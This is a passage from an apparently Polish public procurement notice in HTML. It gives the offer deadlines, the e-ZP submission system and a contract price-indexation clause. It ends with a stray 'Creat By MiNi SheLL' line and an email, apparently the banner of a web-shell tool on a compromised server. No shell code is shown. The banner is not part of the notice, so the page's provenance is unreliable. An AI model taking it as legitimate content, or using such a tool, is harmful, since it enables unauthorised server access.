środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-13 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę w Systemie e-ZP: https://e-zp.umww.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-13 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-11</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Ciąg dalszy zmian umowy - waloryzacja ceny<br/><br/>1.	Zamawiający przewiduje możliwość zmiany wysokości wynagrodzenia należnego Wykonawcy w przypadku zmiany cen materiałów lub kosztów związanych z realizacją Umowy, w przypadku gdy:<br/>a)	minimalny poziom zmiany ceny materiałów lub kosztów odnoszący się do całości przedmiotu Umowy, uprawniający strony Umowy do żądania zmiany wynagrodzenia wynosi 10% w stosunku do cen lub kosztów z miesiąca, w którym złożono Ofertę Wykonawcy,<br/>b)	wartość średniorocznego wskaźnika cen i usług konsumpcyjnych ogółem, publikowanego na podstawie art. 94 ust. 1 pkt 1 lit. a) Ustawy z dnia 17 grudnia 1998 r. o emeryturach i rentach z Funduszu Ubezpieczeń Społecznych (Dz. U. z 2024 poz. 1631 z późn. zm.), liczonego od dnia obowiązywania Umowy, przekroczy poziom 117 (wzrost cen o 17%), o ile okoliczność ta będzie miała wpływ na koszty wykonania Umowy przez Wykonawcę.<br/>2.	Sposób określenia wpływu zmiany ceny materiałów lub kosztów na koszt wykonania zamówienia nastąpi na podstawie wniosku strony wnioskującej o zmianę i dokumentów dołączonych do tego wniosku potwierdzających między innymi rzeczywiste zastosowanie poszczególnych materiałów/poniesienie poszczególnych kosztów w ramach niniejszego zamówienia, a także na podstawie średniorocznego wskaźnika cen i usług konsumpcyjnych ogółem, o których mowa w ust. 1 lit. b) niniejszego paragrafu.<br/>3.	Zmiana wynagrodzenia może nastąpić na podstawie pisemnego aneksu do Umowy podpisanego przez obie Strony.<br/>4.	Maksymalna wartość zmiany wynagrodzenia, jaką dopuszcza Zamawiający, to łącznie 10% w stosunku do wartości całkowitego wynagrodzenia brutto określonego w § 5 ust. 1 Umowy.<br/>5.	Zmiana wynagrodzenia może nastąpić nie częściej niż co kwartał, począwszy najwcześniej od szóstego miesiąca obowiązywania niniejszej Umowy.<br/>6.	Wykonawca zobowiązany jest przekazać Zamawiającemu wniosek o dokonanie zmiany Umowy, w przypadku, o którym mowa w ust. 1, w formie pisemnej, z co najmniej 30 dniowym wyprzedzeniem liczonym na koniec miesiąca wobec wnioskowanej daty obowiązywania nowego wynagrodzenia.<br/>7.	Wniosek powinien zawierać propozycję zmiany Umowy w zakresie wysokości wynagrodzenia wraz z uzasadnieniem (projekt aneksu do Umowy). Uzasadnienie o jakim mowa w zdaniu poprzednim odnosić się powinno do przyszłych kosztów realizacji Umowy, jakie Wykonawca planuje ponieść po dniu złożenia wniosku.<br/>8.	Do wniosku Wykonawca powinien załączyć dokumenty niezbędne do oceny przez Zamawiającego czy okoliczność, o której mowa w ust. 1 lit. b), ma lub będzie miała wpływ na koszty wykonania Umowy przez Wykonawcę oraz w jakim stopniu zmiany tych kosztów uzasadniają zmianę wynagrodzenia.<br/>9.	Zmiana wynagrodzenia Wykonawcy może mieć miejsce wyłącznie wtedy, gdy okoliczność, o której mowa w ust. 1 lit. b) niniejszego paragrafu będzie miała wpływ na koszty wykonania Umowy przez Wykonawcę. Zmiana wynagrodzenia o jakiej mowa w niniejszym ustępie dotyczyć może jedynie kosztów realizacji Umowy, planowanych do poniesienia po dacie złożenia wniosku Wykonawcy o zmianę wysokości wynagrodzenia na zasadach wskazanych w niniejszym paragrafie Umowy.<br/>10.	Klauzula waloryzacji o jakiej mowa w niniejszym paragrafie nie ma zastosowania do zapłaconej już Wykonawcy części Wynagrodzenia. Tym samym na podstawienie niniejszego paragrafu Umowy Wykonawca nie może domagać się od Zmawiającego (nie ma w tym zakresie roszczenia do Zamawiającego) zwiększenia wysokości Wynagrodzenia, które zostało już Wykonawcy wypłacone.

Creat By MiNi SheLL
Email: jattceo@gmail.com